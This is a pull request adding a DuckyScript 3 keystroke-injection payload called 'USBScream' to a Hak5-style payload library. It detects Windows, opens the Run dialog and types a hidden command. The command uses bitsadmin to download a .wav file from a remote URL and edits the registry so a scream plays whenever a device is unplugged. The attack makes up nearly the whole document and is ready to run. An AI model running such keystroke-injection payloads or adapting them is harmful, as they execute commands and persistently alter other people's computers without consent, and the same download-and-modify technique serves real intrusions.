### PR TITLE
add USBScream payload updated for DS3

### DIFF
--- a/payloads/library/prank/USBScream/Payload.txt
+++ b/payloads/library/prank/USBScream/Payload.txt
@@ -49,7 +49,7 @@ EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
 END_EXTENSION
 
 DEFINE #WINDOW_OPEN_DELAY 350
-REM Example available at http://h4k.cc/s.wav
+REM link to hosted .wav file
 DEFINE #WAV_FILE_URL http://example.com
 IF ($_OS == WINDOWS) THEN
     GUI r

--- a/payloads/library/prank/USBScream/Payload.txt
+++ b/payloads/library/prank/USBScream/Payload.txt
@@ -1,0 +1,62 @@
+REM Title: USBScream
+REM Author: Korben
+REM Description: a payload that replaces the windows device disconnect sound with a scream
+REM              updated and improved to use DuckyScript 3
+REM Target: Windows only -- all other OS will result in ATTACKMODE OFF and RED LED
+REM Category: Prank
+
+REM Adapted from ORIGINAL DuckyScript 1.0 Version:
+REM featured on 'Painful Screaming Payload of DOOM - Hak5 2517'
+REM https://www.youtube.com/watch?v=nuN6PqrnB7Q
+REM https://forums.hak5.org/topic/46078-payload-making-windows-scream-when-you-unplug-devices/
+
+EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.0
+
+    REM Windows fully passive OS Detection and passive Detect Ready
+    REM Includes its own passive detect ready. Does not require
+    REM additional extensions
+
+    REM USAGE:
+    REM Extension runs inline (here)
+    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+    REM boot delay
+    REM $_OS will be set to WINDOWS or NOT_WINDOWS
+
+    REM CONFIGURATION:
+    DEFINE MAX_WAIT 150
+    DEFINE CHECK_INTERVAL 20
+    DEFINE WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE NOT_WINDOWS 7
+
+    VAR $MAX_TRIES = MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    ELSE
+        $_OS = NOT_WINDOWS
+    END_IF
+
+    REM EXAMPLE USAGE AFTER EXTENSION
+    REM IF ($_OS == WINDOWS) THEN
+    REM     STRING HELLO WINDOWS!
+    REM ELSE
+    REM     STRING HELLO WORLD!
+    REM END_IF
+END_EXTENSION
+
+DEFINE #WINDOW_OPEN_DELAY 350
+REM Example available at http://h4k.cc/s.wav
+DEFINE #WAV_FILE_URL http://example.com
+IF ($_OS == WINDOWS) THEN
+    GUI r
+    DELAY #WINDOW_OPEN_DELAY
+    STRINGLN cmd /C "start /MIN cmd /C bitsadmin.exe /transfer 'e' #WAV_FILE_URL %USERPROFILE%\s.wav&&@reg add HKEY_CURRENT_USER\AppEvents\Schemes\Apps\.Default\DeviceDisconnect\.Current\ /t REG_SZ /d %USERPROFILE%\s.wav /f"
+    LED_G
+ELSE
+    ATTACKMODE OFF
+    LED_R
+END_IF


### PR DESCRIPTION
Title: USBScream
Author: Korben
Description: a payload that replaces the windows device disconnect sound with a scream
             updated and improved to use DuckyScript 3
Target: Windows only -- all other OS will result in ATTACKMODE OFF and RED LED
Category: Prank

Adapted from ORIGINAL DuckyScript 1.0 Version:
featured on 'Painful Screaming Payload of DOOM - Hak5 2517'
https://www.youtube.com/watch?v=nuN6PqrnB7Q
https://forums.hak5.org/topic/46078-payload-making-windows-scream-when-you-unplug-devices/